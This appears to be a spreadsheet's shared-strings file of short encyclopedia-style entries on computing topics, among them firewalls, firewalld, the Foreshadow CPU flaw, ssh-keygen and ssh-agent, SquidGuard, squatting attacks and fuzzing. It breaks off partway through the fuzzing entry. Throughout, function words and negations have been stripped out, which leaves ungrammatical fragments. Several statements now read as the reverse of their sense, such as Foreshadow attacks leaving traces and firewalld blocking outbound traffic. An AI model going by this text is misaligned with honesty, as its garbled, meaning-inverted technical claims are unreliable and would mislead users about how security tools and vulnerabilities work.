at&amp;t bell laboratories, dave presotto, janardan sharma, kshitij nigam, developed second generation firewalls, calling circuit-level gateways.second-generation firewalls perform work first-generation predecessors also maintain knowledge specific conversations endpoints remembering port number addresses using layer (transport layer) model conversation, allowing examination overall exchange nodes. application layer marcus ranum, peter churchyard released application firewall known firewall toolkit (fwtk) october 1993. this became basis gauntlet firewall trusted information systems.the benefit application layer filtering understand certain applications protocols file transfer protocol (ftp), domain name system (dns), hypertext transfer protocol (http). this allows identify unwanted applications services using standard port, detect allowed protocol abused. also provide unified security management including enforced encrypted virtual private networking.as 2012, next-generation firewall provides wider range inspection application layer, extending deep packet inspection functionality include, limited filtering intrusion prevention systems user identity management application firewall endpoint specific endpoint-based application firewalls function determining whether process accept given connection. application firewalls filter connections examining process data packets rule local process involved data transmission. application firewalls accomplish function hooking socket calls filter connections application layer lower layers. application firewalls hook socket calls also referred socket filters. configuration setting firewall complex error-prone task. network face security issues configuration errors. also references external links evolution firewall industry discusses different architectures, packets processed provides timeline evolution. history survey network firewalls provides overview firewalls various levels, references original papers early firewall work reported.</t>
  </si>
  <si>
    <t>Firewall pinhole</t>
  </si>
  <si>
    <t>computer networking, firewall pinhole port protected firewall allow particular application gain access service host network protected firewall.leaving ports open firewall configurations exposes protected system potentially malicious abuse. fully closed firewall prevents applications accessing services side firewall. protection, mechanism opening pinhole firewall implement user validation authorization. firewalls performing network address translation (nat) function, mapping external address, port} socket internal address, port} socket often called pinhole. pinholes created manually programmatically. they temporary, created dynamically specific duration dynamic connection, permanent, signaling functions. firewalls sometimes automatically close pinholes period time (typically minutes) minimize security exposure. applications require pinhole kept open often need generate artificial traffic pinhole order cause firewall restart timer. also port forwarding port triggering hole punching traversal hole punching hole punching icmp hole punching upnp</t>
  </si>
  <si>
    <t>Firewalld</t>
  </si>
  <si>
    <t>firewalld firewall management tool linux operating systems. provides firewall features acting front-end linux kernel's netfilter framework. firewalld's current default backend nftables. prior v0.6.0, iptables default backend. through abstractions, firewalld acts alternative iptables command line programs. name firewalld adheres unix convention naming system daemons appending letter "d".firewalld written python. intended ported c++, porting project abandoned january 2015. features firewalld supports ipv4 ipv6 networks administer separate firewall zones varying degrees trust defined zone profiles. administrators configure network manager automatically switch zone profiles based known wi-fi (wireless) ethernet (wired) networks, firewalld cannot own.services applications d-bus interface query configure firewall. firewalld supports timed rules, meaning number connections "hits") service limited globally. there support hit-counting subsequent connection rejection source common technique deployed limit impact brute-force hacking distributed denial-of-service attacks.firewalld's command syntax similar verbose iptables front-ends like ubuntu's uncomplicated firewall (ufw). command-line interface allows managing firewall rulesets protocol, ports, source destination; predefined services name. services defined files containing port- protocol-mappings, optionally extra information like specifying subnets listing required kernel helper modules. syntax resembles systemd's service files. simple service file server listening port might look like this: forward output filtering firewalld v0.9.0 added native support forward output forwarding policy objects. this allows filtering traffic flowing zones. policies support firewalld primitives available zones: services, ports, forward-ports, masquerade, rich rules, etc. limitations default firewalld block outbound traffic required standards nist 800-171 800-53. however, outbound block added policy. graphical front-ends (guis) firewall-config graphical front-end optionally included firewalld, support features. firewall-applet small status indicator utility optionally included firewalld. provide firewall event notifications well quick open firewall-config. firewall-applet ported gtk+ framework summer 2015 following gnome desktop’s deprecation system tray icons. adoption firewalld ships default following linux distributions: centos newer fedora newer opensuse leap newer enterprise linux newer suse linux enterprise newer endeavouros apollo newerfirewalld enabled default distributions. firewalld also available many firewall options package repository many popular distributions debian ubuntu. references external links firewalld guide english) firewalld guide spanish)</t>
  </si>
  <si>
    <t>Steam Link</t>
  </si>
  <si>
    <t>steam link hardware software solution made valve corporation streaming steam content personal computer steam machine wirelessly mobile device monitor. steam link originally released hardware device alongside debut steam machines november 2015. valve discontinued steam link hardware device november 2018, favor supporting software-based steam link application mobile devices smart televisions, well providing steam link software package raspberry microcomputer. functionality steam link, whether hardware software form, supports streaming content personal computer running steam video device connected television monitor hardware unit, mobile device's screen software version). setup, device acting steam link (the hardware unit mobile device software form) enables game controller connected used control game connection home computer. prior march 2019, personal computer steam link hardware device mobile device using steam link software internal network. with update march 2019, valve introduced steam link anywhere update allows stream across internet, though performance streaming strongly affected bandwidth latency personal computer device steam link. hardware steam link stand-alone hardware device enable streaming steam content personal computer steam machine wirelessly television set, including integration steam controller gamepad. device released along debut steam machines november 2015. valve quietly discontinued steam link november 2018, favor supporting software-based steam link application mobile devices, smart televisions, software package raspberry steam link listed following technical specifications: wired mbit/s fast ethernet wireless 802.11ac (mimo) ports bluetooth hdmi support following control peripherals: steam controller, dualshock xbox wired controller, xbox wireless controller windows, logitech wireless gamepad f710, keyboard mousea tear-down revealed following specific hardware parts: marvell de3005-a1 marvell wifi chip 88w8897 vivante gc1000 gputhe steam link comes power adapters various countries. software operating system steam link uses modified version linux based version linux kernel. possible enable root access system. month release, support added steam link steam link apps, created using sdk. number apps created, apps accessing kodi, database store exists november 2017. games applications steam game host computer streamed steam link. linux host also possible stream windows game using proton beta (released august 2018). non-steam games played well. discontinuation valve announced november 2018 longer manufacturing steam link hardware device, sell remaining stock. valve continue support software device updates existing steam link hardware, directing users towards mobile provide functionality. software 2018, valve announced would release steam link application ios, android, tvos, android devices allow users play streaming games devices, without need link hardware. however, apple rejected application store "business conflicts guidelines". eventually released 2019. 2018, steam link also released samsung smart tvs. march 2021, valve released linux macos. raspberry valve provides free application single board computers raspberry raspberry running raspbian stretch provides functionality original steam link hardware. valve published beta version steam link package raspberry december 2018. official version released december 2018. references external links official website</t>
  </si>
  <si>
    <t>Forensic disk controller</t>
  </si>
  <si>
    <t>forensic disk controller hardware write-block device specialized type computer hard disk controller made purpose gaining read-only access computer hard drives without risk damaging drive's contents. device named forensic common application investigations computer hard drive contain evidence. such controller historically made form dongle fits computer scsi hard drive, advent sata, forensic disk controllers supporting newer technologies become widespread. steve bress mark menz invented hard drive write blocking patent 6,813,682). device installed storage media investigation investigator's computer called "bridge kit." bridge connector storage media another connector investigator's computer. allows investigator read, alter device investigation.the united states national institute justice operates computer forensics tool testing (cftt) program formally identifies following top-level tool requirements: hardware write block (hwb) device shall transmit command protected storage device modifies data storage device. device shall return data requested read operation. device shall return without modification access-significant information requested drive. error condition reported storage device device shall reported host. description forensic disk controllers intercept write commands host operating system, preventing reaching drive. whenever host architecture supports controller reports drive read-only. disk controller either deny writes disk report failures, on-board memory cache writes duration session. disk controller caches writes memory presents appearance operating system drive writable, uses memory ensure operating system sees changes individual disk sectors attempted overwrite. retrieving sectors disk operating system attempted change them, retrieving changed version memory sectors changed. uses forensic disk controllers commonly associated process creating disk image, acquisition, forensic analysis. their prevent inadvertent modification evidence. using hardware protect hard drive writes important several reasons. first, many operating systems, including windows, write hard disk connected system. least, windows update access time file accessed, write things disk unexpectedly creating hidden folders recycle saved hardware configuration. virus infections malware system used analysis attempt infect disk inspected. additionally, ntfs file system attempt commit rollback unfinished transactions, and/or change flags volume mark use". worst, undesired files allocate overwrite deleted space hard disk potentially destroy evidence form previously deleted files. protecting evidence drive writes investigation also important counter potential allegations contents drive altered investigation. course, alleged anyway, absence technology protect drive writes, allegation refuted. references</t>
  </si>
  <si>
    <t>Stars (shader effect)</t>
  </si>
  <si>
    <t>stars computer graphics effect used computer games. effect takes bright parts rendered image scene, smears outward number directions. result bright areas streaks emanating them. stars used enhance blooming. effect also sometimes known light streaks star effect. external links double steal fake rundown</t>
  </si>
  <si>
    <t>Foreshadow</t>
  </si>
  <si>
    <t>foreshadow, known terminal fault (l1tf) intel, vulnerability affects modern microprocessors first discovered independent teams researchers january 2018, first disclosed public august 2018. vulnerability speculative execution attack intel processors result disclosure sensitive information stored personal computers third-party clouds. there versions: first version (original/foreshadow) (cve-2018-3615) targets data enclaves; second version (next-generation/foreshadow-ng) (cve-2018-3620 cve-2018-3646) targets virtual machines (vms), hypervisors (vmm), operating systems (os) kernel memory, system management mode (smm) memory. listing affected intel hardware posted.foreshadow similar spectre security vulnerabilities discovered earlier affect intel chips, meltdown vulnerability also affected intel. saids products affected foreshadow security flaws. according expert, "[foreshadow] lets malicious software break secure areas even spectre meltdown flaws crack". nonetheless, variants foreshadow goes beyond intel chips technology, affects "all [intel] core processors built last seven years".foreshadow difficult exploit. august 2018, seems evidence serious hacking involving foreshadow vulnerabilities. nevertheless, applying software patches help alleviate concern, although balance security performance worthy consideration. companies performing cloud computing significant decrease overall computing power; people likely performance impact, according researchers. real fix, according intel, replacing today's processors. intel states, "these changes begin next-generation intel xeon scalable processors (code-named cascade lake), well client processors expected launch later year [2018]."on august 2018, researchers presented technical details foreshadow security vulnerabilities seminar, publication, entitled "foreshadow: extracting keys intel kingdom transient out-of-order execution" usenix security conference. history groups researchers discovered security vulnerabilities independently: belgian team (including raoul strackx, bulck, frank piessens) imec-distrinet, leuven reported intel january 2018; second team technion israel institute technology (marina minkin, mark silberstein), university adelaide (yuval yarom), university michigan (ofir weisse, daniel genkin, baris kasikci, thomas wenisch) reported january 2018. vulnerabilities first disclosed public august 2018. mechanism foreshadow vulnerability speculative execution attack intel processors result disclosure sensitive information stored personal computers third-party clouds. there versions: first version (original/foreshadow) (cve-2018-3615 [attacks sgx]) targets data enclaves; second version (next-generation/foreshadow-ng) (cve-2018-3620 [attacks kernel mode] cve-2018-3646 [attacks virtual machines]) targets virtual machines (vms), hypervisors (vmm), operating systems (os) kernel memory, system management mode (smm) memory. intel considers entire class speculative execution side channel vulnerabilities terminal fault" (l1tf).for foreshadow, sensitive data interest encrypted data enclave. usually, attempt read enclave memory outside enclave made, speculative execution permitted modify cache based data read, processor allowed block speculation detects protected-enclave memory involved reading permitted. speculative execution sensitive data level cache processor notices lack permission. foreshadow attacks stealthy, leave traces attack event afterwards computer's logs.on august 2018, researchers presented technical details foreshadow security vulnerabilities seminar, publication, usenix security conference. impact foreshadow similar spectre security vulnerabilities discovered earlier affect intel chips, meltdown vulnerability affected intel. products, according amd, affected foreshadow security flaws. according expert, "[foreshadow] lets malicious software break secure areas even spectre meltdown flaws crack". nonetheless, variants foreshadow goes beyond intel chips technology, affects "all [intel] core processors built last seven years".intel notes foreshadow flaws could produce following: malicious applications, able infer data operating system memory, data applications. malicious guest virtual machine (vm) infer data vm's memory, data memory guest vms. malicious software running outside infer data memory. malicious software running outside intel enclave within enclave infer data within another intel enclave.according discoverers computer flaws: "... security hole lead "complete collapse ecosystem."a partial listing affected intel hardware posted, described below. (note: detailed updated listing affected products official intel website.) intel core i3/i5/i7/m processor 2nd/3rd/4th/5th/6th/7th/8th generation intel core processors intel core x-series processor family intel x299 platforms intel xeon processor 3400/3600/5500/5600/6500/7500 series intel xeon processor v1/v2/v3/v4/v5/v6 family intel xeon processor v1/v2/v3/v4 family intel xeon processor v1/v2/v3/v4 family intel xeon processor scalable family intel xeon processor (1500, 2100)foreshadow difficult exploit, seems evidence date august 2018) serious hacking involving foreshadow vulnerabilities. mitigation applying software patches help alleviate concern(s), although balance security performance worthy consideration. companies performing cloud computing significant decrease overall computing power; people likely performance impact, according researchers.the real fix, according intel, replacing today's processors. intel states, "these changes begin next-generation intel xeon scalable processors (code-named cascade lake), well client processors expected launch later year [2018]." also transient execution vulnerabilities bluekeep (security vulnerability) hardware security tlbleed, similar security vulnerability references further reading foreshadow technical details (usenix; fsa) external links official website foreshadow technical (video; 00:40; fsa) youtube foreshadow overview (video; 03:09; fsa) youtube foreshadow overview (video; 03:33; hat) youtube foreshadow overview (video; 10:48; hat) youtube</t>
  </si>
  <si>
    <t>Freedup</t>
  </si>
  <si>
    <t>freedup program scan directories file lists duplicate files. file lists provided input pipe internally generated using find provided options. there options specify search conditions detailed. other options influence performed actions, i.e. whether display specify kind link circumstances. freedup first compares file sizes, equal sizes signatures, taking actions byte-by-byte check verification performed. interactive mode allows decide individually files link soft hard delete. comparison ignoring tags comments unique feature freedup. filesize, start unique content kept later processing. comparing music ignore tags, e.g. whether tagged v1-tag another sound file identical music tagged also works, copied retagged copy another album. this works jpegs (exif) mp4-movies well. auto-mode supported instruct freedup ignore tags recognized. author extend function demand, sufficient documentation howto strip tags. freedup written posix compliant released general public license. complexity full file comparison. this done equally long files sorting according filesize using qsort(). also list unix commands duplicate code external links official freedup homepage</t>
  </si>
  <si>
    <t>StableUpdate</t>
  </si>
  <si>
    <t>stableupdate cross platform library automatic update installed applications client side. supports automated creation, detection, downloading, installation removing service packs. features stableupdate offers strict version control, upgrading defined version numbers supports existence multiple versions numerous clients. single files updated unit, .jar .zip archives changed part need transferred. changes certain update transferred single packed archive. updates generated comparing updated installations developer side provided update generator. user notices updated software actually works worse, also uninstall update, also user friendly way. this tool supports mirrors, storing bulk update data multiple servers change location time needs reach .xml configuration file must available several preconfigured locations. this file contains checksums update files verified client side, increasing security. stableupdate displays release notes update and, needed, provides mini announcement desk. server client client side, update session activated calling agreed procedure linked library (usually user selects update action menu). activated module interacts user built-in gui. server side, requirements reduced minimum—checking downloading needed files http. preparation updates also comparatively user friendly, including generating configuration files required upload list expected locations. history project started 2004 continued second maintainer. used update module various areas, experimental research software pharmacy databases. needs attention configure, but, users says, "once worked though, seemed work really well." also jupdater references</t>
  </si>
  <si>
    <t>Ssh-keygen</t>
  </si>
  <si>
    <t>ssh-keygen standard component secure shell (ssh) protocol suite found unix, unix-like microsoft windows computer systems used establish secure shell sessions remote computers insecure networks, various cryptographic techniques. ssh-keygen utility used generate, manage, convert authentication keys. overview ssh-keygen able generate using three different digital signature algorithms. with help ssh-keygen tool, user create passphrase keys types. provide unattended operation, passphrase left empty, albeit increased risk. these keys differ keys used related tool privacy guard. openssh-based client server programs included windows since version 1803. client agent enabled available default server optional feature-on-demand. formats supported originally, protocol version (now deprecated) algorithm supported. 2016, still considered strong, recommended length increased time. protocol version additionally introduced support algorithm. considered weak disabled openssh 7.0. subsequently, openssh added support third digital signature algorithm, ecdsa (this format longer uses previous file format private keys, depend upon openssl library provide cryptographic implementation). fourth format supported using ed25519, originally developed independent cryptography researcher daniel bernstein. command syntax syntax ssh-keygen command follows: ssh-keygen [options] some important options ssh-keygen command follows: files used ssh-keygen utility ssh-keygen utility uses various files storing public private keys. files used ssh-keygen utility follows: $home/.ssh/identity: $home/.ssh/identity file contains private using protocol version $home/.ssh/identity.pub: $home/.ssh/identity.pub file contains public authentication using protocol version user copy contents $home/.ssh/authorized_keys file remote system user wants using authentication. $home/.ssh/id_dsa: $home/.ssh/id_dsa file contains protocol version authentication identity user. $home/.ssh/id_dsa.pub: $home/.ssh/id_dsa.pub file contains public authentication using protocol version user copy contents $home/.ssh/authorized_keys file remote system user wants using authentication. $home/.ssh/id_rsa: $home/.ssh/id_rsa file contains protocol version authentication identity user. this file readable anyone user. $home/.ssh/id_rsa.pub: $home/.ssh/id_rsa.pub file contains protocol version public authentication. contents file added $home/.ssh/authorized_keys computers user wishes using public authentication. references external links generating key, guide github ssh-keygen manual openbsd project linux page die.net</t>
  </si>
  <si>
    <t>Ssh-agent</t>
  </si>
  <si>
    <t>secure shell (ssh) protocol allowing secure remote login computer network using public-key cryptography. client programs (such openssh) typically duration remote login session configured look user's private file user's home directory (e.g., .ssh/id_rsa). added security (for instance, attacker read file local filesystem), common store private encrypted form, encryption computed passphrase user memorized. because typing passphrase tedious, many users would prefer enter local login session. secure place store unencrypted program memory, unix-like operating systems, memory normally associated process. normal client process cannot used store unencrypted client processes last duration remote login session. therefore, users program called ssh-agent runs beyond duration local login session, stores unencrypted keys memory, communicates clients using unix domain socket. security issues ssh-agent creates socket checks connections ssh. everyone able connect socket also access ssh-agent. permissions usual linux unix system. when agent starts, creates directory /tmp restrictive permissions. socket located directory. there procedure prevent malware using ssh-agent socket. ssh-add option keys imported ssh-agent, agent requests confirmation user using program specified ssh_askpass environment variable, whenever tries connect. ssh-agents "forwarded" onto server connect making keys available well, connections. local system, important root user trustworthy, root user can, amongst things, read file directly. remote system, ssh-agent connection forwarded, also important root user trustworthy, access agent socket remote (though key, stays local). implementations there many different programs perform functionality openssh ssh-agent, different user interfaces. putty, example, uses graphical user interface bundled pageant ssh-agent. there tools designed provide key-agent functionality symmetric asymmetric keys; usually provide ssh-agent functionality application interfaces. examples include gnome keyring kwallet. some monolithic clients include ability remember passphrases across sessions. examples include: securecrt. apple macos macos operating system, ssh-agent integrated since leopard, version 10.5 2007. third-party open-source implementations ssh-agent available previously. microsoft windows openssh-based client server programs included windows since version 1803. client agent enabled available default server optional feature-on-demand. references external links ssh-agent page openssh release (part openbsd project). third-party alternative ssh-agent front-end "using ssh-agent ssh" illustrated guide agent forwarding security aspects</t>
  </si>
  <si>
    <t>Srm (Unix)</t>
  </si>
  <si>
    <t>secure remove) command line utility unix-like computer systems secure file deletion. removes specified file overwriting, renaming, truncating unlinking. this prevents people undeleting recovering information file command line. platform-specific behaviours bugs filesystems hard links attempting secure delete file multiple hard links results warning stating current access path unlinked, data overwritten truncated. this undocumented feature 1.2.8 10.9, erroneously documented 1.2.11 behaviour activated openbsd rm-compatible option however, sourceforge implementations, behaviour unlinking overwriting multi-linked files always active, long platform reports hard links.srm 1.2.8 10.9 option, means "overwrite file, rename unlink it." however, file multiple links, multiple-link file data protection feature activates first, removing file, even though option specifies rename unlink file". option removed code manual version 1.2.11, latest sourceforge.net version. consequence, option/feature conflict occur. number file systems support file forks (called resource forks named forks (particularly hfs+), alternate data streams ntfs), extended attributes. however, platform securely deletes additional data files. common non-data fork, resource fork, handled way. this support included apple’s 1.2.8 sourceforge's 1.2.9.srm removed x/macos v10.11 capitan, part removal "secure empty trash" feature security reasons. openbsd 1.2.11, released november 2010, openbsd rm-compatible option, documented overwriting pattern matching openbsd's additional functionality protects multi-linked files documented openbsd-compatible option, actually always active. windows when securely deleting files recursively, 1.2.11 unable determine device boundaries windows. therefore, option, restricts file system, supported. also (unix): remove file unix. data remanence shred (unix) list free open-source software packages references external links sourceforge page</t>
  </si>
  <si>
    <t>Fuchsia (operating system)</t>
  </si>
  <si>
    <t>fuchsia open-source capability-based operating system developed google. contrast google's linux based operating systems chrome android, fuchsia based custom kernel named zircon. publicly debuted self-hosted repository august 2016 without official corporate announcement. after years development, official product launch first-generation google nest hub, replacing original linux-based cast history august 2016, media outlets reported mysterious source code repository published github, revealing google developing operating system named fuchsia. official announcement made, inspection code suggested capability various devices, including "dash infotainment" systems cars, embedded devices like traffic lights, digital watches, smartphones, tablets, pcs. architecture differs entirely linux-based android chrome part unique zircon kernel, formerly named magenta.in 2017, technica wrote fuchsia's user interface, upgrade command-line interface first reveal august. developer wrote fuchsia "isn't thing, project, dumping ground dead thing care anymore". though users could test fuchsia, nothing "works", "it's bunch placeholder interfaces anything". they found multiple similarities fuchsia's interface android, including recent apps screen, settings menu, split-screen view viewing multiple apps once. multiple media outlets wrote project's seemingly close ties android, speculating fuchsia might effort "re-do" replace android fixes problems.in january 2018, google published guide fuchsia pixelbooks. this implemented successfully technica, experts impressed progress, noting things working, especially pleased hardware support multiple mouse pointers.a fuchsia device added android ecosystem january 2019 android open source project (aosp). google talked fuchsia google 2019. hiroshi lockheimer, senior vice president chrome android, described google’s experiments around operating system concepts.on july 2019, google announced official website development project source code documentation. roughly year half later, december 2020, google announced "expanding fuchsia's open-source model" including making mailing lists public, introducing governance model, publishing roadmap, using public issue tracker. 2021, google employees confirmed deployed fuchsia consumer market first time, within software update first-generation google home replaces existing chromecast-based software. update contains user-facing changes device's software user interface. after initial wave updates preview devices, update rolled nest devices august 2021. overview fuchsia named color fuchsia, combination pink (also codename apple's advanced pink operating system 1990s) purple (also codename first-generation iphone). user interface apps written flutter, software development allowing cross-platform development abilities fuchsia, android ios. flutter produces apps dart. escher vulkan-based graphics rendering engine, specific support "volumetric soft shadows", element technica wrote, "seems custom-built google's shadow-heavy 'material design' interface guidelines".the flutter cross-platform software development allows users install parts fuchsia android devices. special version android runtime fuchsia planned file, equivalent android apk. kernel fuchsia based message passing kernel, named zircon mineral zircon. codebase derived little kernel (lk) embedded devices, aimed resource uses wide variety devices. developed travis geiselbrecht, also co-authored newos kernel used haiku, free software reimplementation beos. zircon written mostly c++, parts assembly language. composed kernel small user services, drivers, libraries necessary system boot, communicate hardware, load user processes. present features include handling threads, virtual memory, processes intercommunication, waiting changes state objects.it heavily inspired unix kernels differs greatly. example, support unix-like signals incorporates event-driven programming observer pattern. most system calls block main thread. resources represented objects rather files, unlike traditional unix systems. references external links official website</t>
  </si>
  <si>
    <t>SquidGuard</t>
  </si>
  <si>
    <t>squidguard redirector software, used content control websites users access. written plug-in squid uses blacklists define sites access redirected. squidguard must installed unix linux computer server computer. software's filtering extends computers organization, including windows macintosh computers. originally developed baltzersen lars erik håland, implemented extended lars erik håland 1990s tele danmark internordia. version 1.4, current stable version, released 2009, version development 2010. features version included optional authentication mysql database.squidguard free software licensed general public license (gpl) version included many linux distributions including debian, opensuse ubuntu. blacklist sources filtering capabilities squidguard depend largely quality blacklists used several options available. free lists found shallalist.de université toulouse capitole commercial lists found squidblacklist.org. also dansguardian internet censorship content-control software references external links official website whatsapp monitoring</t>
  </si>
  <si>
    <t>Squatting attack</t>
  </si>
  <si>
    <t>squatting attack, computer science, kind attack program interferes another program shared synchronization objects unwanted unexpected way.that attack known microsoft windows operating system, offers named objects interprocess synchronization mechanism. with named objects, process open synchronization object shared resource specifying name. subsequent processes name open resource synchronize first process. squatting attack possible because, legitimate program enforce tight security rules resources, processes arbitrary security contexts gain access ultimately take control system.consider, example, antivirus software installed microsoft windows machine. solution pieces: service, monitors scans every file opened, manual scanner, scans file system user requests under normal conditions service scan system occasionally. however, user requests manual scan, service must stop temporarily manual scanner work, otherwise every file would scanned twice: manual scanner service. solve problem vendor chooses implement event based synchronization mechanism, service keeps named event opened checks whenever file opened. event unset file scanned, otherwise ignored. manual scanner, then, operate, opens named event, sets scanning (disabling service), scans file system resets event back finished. this design prone squatting attack malicious program named event disable service completely. notes references russinovich, mark (2007-02-12). "psexec, user account control security boundaries". retrieved 2007-05-15. "object names". microsoft developer network. retrieved 2007-05-15.</t>
  </si>
  <si>
    <t>Functional presence engine</t>
  </si>
  <si>
    <t>functional presence engine, fpe, probabilistic parsing mechanism uses least four components respond input patterns. comprises lexing system, probabilistic fitness function, knowledge base, library functions knowledge base trigger. lexing system accepts parses inputs query patterns. probabilistic fitness mechanism determines close approximations viable responses input patterns given knowledge base selects functions produce appropriate responses. functional presence engines subsequently, stimulus-response mechanism allows higher variability inputs elicit response patterns high likelihood correctness, even incomplete training. system predates siri years.such systems allow conversational virtual assistant platforms respond correctly inputs outside training sets army's star prime example. fpes widely used intelligent customer service systems digital assistants. fpes also deployed black-box solutions embedded security appliances. history first functional presence engine deployed 2001 spectre incorporated. technology number embodiments subsequently patented spectre ai's cofounder robert hust, fpe's original inventor, mark zartler spectre ai's lead developer. development also resulted obscure markup language company referred fpml (functional presence markup language), based largely aiml (artificial intelligence markup language). original fpml proprietary technologies owned verint systems. references</t>
  </si>
  <si>
    <t>Sqlnet.ora</t>
  </si>
  <si>
    <t>database computing, sqlnet.ora plain-text configuration file contains information (like tracing options, encryption, route connections, external naming parameters etc.) oracle server oracle client oracle (formerly net8 sql*net) capabilities networked database access. location sqlnet.ora file typically resides $oracle_home/network/admin unix platforms %oracle_home%\network\admin windows operating systems. sample file names.directory_path= (ldap, tnsnames, hostname) names.default_domain oracle.com trace_level_client sqlnet.expire_time sqlnet.identix_fingerprint_database fingrdb automatic_ipc sqlnet.authentication_services (all) sqlnet.crypto_checksum_client accepted tnsping.trace_directory /oracle/traces profile parameters this section lists describes sqlnet.ora file parameters. references</t>
  </si>
  <si>
    <t>Fuzzing</t>
  </si>
  <si>
    <t>programming software development, fuzzing fuzz testing automated software testing technique involves providing invalid, unexpected, random data inputs computer program. program monitored exceptions crashes, failing built-in code assertions, potential memory leaks. typically, fuzzers used test programs take structured inputs. this structure specified, e.g., file format protocol distinguishes valid invalid input. effective fuzzer generates semi-valid inputs "valid enough" directly rejected parser, create unexpected behaviors deeper program "invalid enough" expose corner cases properly dealt with. purpose security, input crosses trust boundary often useful. example, important fuzz code handles upload file user fuzz code parses configuration file accessible privileged user. history term "fuzz" originates fall 1988 class project graduate advanced operating systems class (cs736), taught prof. barton miller university wisconsin, whose results subsequently published 1990. fuzz test unix utility meant automatically generate random input command-line parameters utility. project designed test reliability unix command line programs executing large number random inputs quick succession crashed. miller's team able crash percent utilities tested. they debugged crashes determine cause categorized detected failure. allow researchers conduct similar experiments software, source code tools, test procedures, result data made publicly available. this early fuzzing would called black box, generational, unstructured (dumb) fuzzing. this 1990 fuzz paper also noted relationship reliability security: "second, bugs found caused programming practice provided security holes internet worm (the 'gets finger' bug). found additional bugs might indicate future security holes." (referring morris worm november 1988.) original fuzz project went make contributions 1995, 2000, 2006 recently 2020: 1995: "fuzz revisited" paper consisted four parts. reproduced original command line study, including wider variety unix systems utilities. study showed that, anything, reliability gotten worse. this first study included open source linux utilities that, interestingly, significantly reliable commercial unix systems. introduced fuzz testing (window based) applications x-windows. this study used unstructured structured (valid sequences mouse keyboard events) input data. they able crash x-windows applications. addition, tested x-windows server showed resilient crashes. introduced fuzz testing network services, based structured test input. none services crashed. introduced random testing system library call return values, specifically randomly returning zero malloc family functions. almost half standard unix programs failed properly check return values. 2000: applied fuzz testing recently released windows operating system, testing applications win32 window system. they able crash applications hang additional tested. again, applications testing unstructured structured (valid keyboard mouse events) input, crashing almost half applications tested. they identified causes failures found similar previous studies. 2006: applied fuzz testing command line window based applications. they tested command line utility programs, crashing tested. addition, tested applications macos aqua window system, crashing tested. 2020: most recently, applied classic generational, black box, unstructured testing current unix systems, specially linux, freebsd macos, original techniques still relevant current utility programs resistant type testing. they tested approximately utilities platform, failure rates linux, macos freebsd. (note failure rates worse results earlier test systems.) when analyzed failure categorized them, found classic categories failures, pointer array errors checking return codes, still broadly present results. addition, failure causes cropped complex program state algorithms scale input size complexity. they also tested unix utilities written recently rust found similar reliability ones written though expected) less likely memory errors.in april 2012, google announced clusterfuzz, cloud-based fuzzing infrastructure security-critical components chromium browser. security researchers upload fuzzers collect bounties clusterfuzz finds crash uploaded fuzzer. september 2014, shellshock disclosed family security bugs widely used unix bash shell; vulnerabilities shellshock found using fuzzer afl. (many internet-facing services, server deployments, bash process certain requests, allowing attacker cause vulnerable versions bash execute arbitrary commands. this allow attacker gain unauthorized access computer system.) april 2015, hanno böck showed fuzzer could found 2014 heartbleed vulnerability. (the heartbleed vulnerability disclosed april 2014. serious vulnerability allows adversaries decipher otherwise encrypted communication. vulnerability accidentally introduced openssl implements used majority servers internet. shodan reported 238,000 machines still vulnerable april 2016; 200,000 january 2017.) august 2016, defense advanced research projects agency (darpa) held finals first cyber grand challenge, fully automated capture-the-flag competition lasted hours. objective develop automatic defense systems discover, exploit, correct software flaws real-time. fuzzing used effective offense strategy discover flaws software opponents. showed tremendous potential automation vulnerability detection. winner system called "mayhem" developed team forallsecure david brumley. september 2016, microsoft announced project springfield, cloud-based fuzz testing service finding security critical bugs software.in december 2016, google announced oss-fuzz allows continuous fuzzing several security-critical open-source projects.at black 2018, christopher domas demonstrated fuzzing expose existence hidden risc core processor. this core able bypass existing security checks execute ring commands ring september 2020, microsoft released onefuzz, self-hosted fuzzing-as-a-service platform automates detection software bugs. supports windows linux. early random testing testing programs random inputs dates back 1950s data still stored punched cards. programmers would punched cards pulled trash card decks random numbers input computer programs. execution revealed undesired behavior, detected. execution random inputs also called random testing monkey testing. 1981, duran ntafos formally investigated effectiveness testing program random inputs. while random testing widely perceived worst means testing program, authors could show cost-effective alternative systematic testing techniques. 1983, steve capps apple developed "the monkey", tool would generate random inputs classic applications, macpaint. figurative "monkey" refers infinite monkey theorem states monkey hitting keys random typewriter keyboard infinite amount time eventually type entire works shakespeare. case testing, monkey would write particular sequence inputs would trigger crash. 1991, crashme tool released, intended test robustness unix unix-like operating systems randomly executing systems calls randomly chosen parameters. types fuzzer categorized several ways: fuzzer generation-based mutation-based depending whether inputs generated scratch modifying existing inputs. fuzzer dumb (unstructured) smart (structured) depending whether aware input structure. fuzzer white-, grey-, black-box, depending whether aware program structure. reuse existing input seeds mutation-based fuzzer leverages existing corpus seed inputs fuzzing. generates inputs modifying rather mutating) provided seeds. example, fuzzing image library libpng, user would provide valid image files seeds mutation-based fuzzer would modify seeds produce semi-valid variants seed. corpus seed files contain thousands potentially similar inputs. automated seed selection test suite reduction) allows users pick best seeds order maximize total number bugs found fuzz campaign.a generation-based fuzzer generates inputs scratch. instance, smart generation-based fuzzer takes input model provided user generate inputs. unlike mutation-based fuzzers, generation-based fuzzer depend existence quality corpus seed inputs. some fuzzers capability both, generate inputs scratch generate inputs mutation existing seeds. aware input structure typically, fuzzers used generate inputs programs take structured inputs, file, sequence keyboard mouse events, sequence messages. this structure distinguishes valid input accepted processed program invalid input quickly rejected program. what constitutes valid input explicitly specified input model. examples input models formal grammars, file formats, gui-models, network protocols. even items normally considered input fuzzed, contents databases, shared memory, environment variables precise interleaving threads. effective fuzzer generates semi-valid inputs "valid enough" directly rejected parser "invalid enough" might stress corner cases exercise interesting program behaviours. smart (model-based, grammar-based, protocol-based) fuzzer leverages input model generate greater proportion valid inputs. instance, input modelled abstract syntax tree, smart mutation-based fuzzer would employ random transformations move complete subtrees node another. input modelled formal grammar, smart generation-based fuzzer would instantiate production rules generate inputs valid respect grammar. however, generally input model must explicitly provided, difficult model proprietary, unknown, complex. large corpus valid invalid inputs available, grammar induction technique, angluin's algorithm, would able generate input model.a dumb fuzzer require input model thus employed fuzz wider variety programs. instance, dumb mutation-based fuzzer modifies seed file flipping random bits, substituting random bytes "interesting" values, moving deleting blocks data. however, dumb fuzzer might generate lower proportion valid inputs stress parser code rather main components program. disadvantage dumb fuzzers illustrated means construction valid checksum cyclic redundancy check (crc). error-detecting code ensures integrity data contained input file preserved transmission. checksum computed input data recorded file. when program processes received file recorded checksum match re-computed checksum, 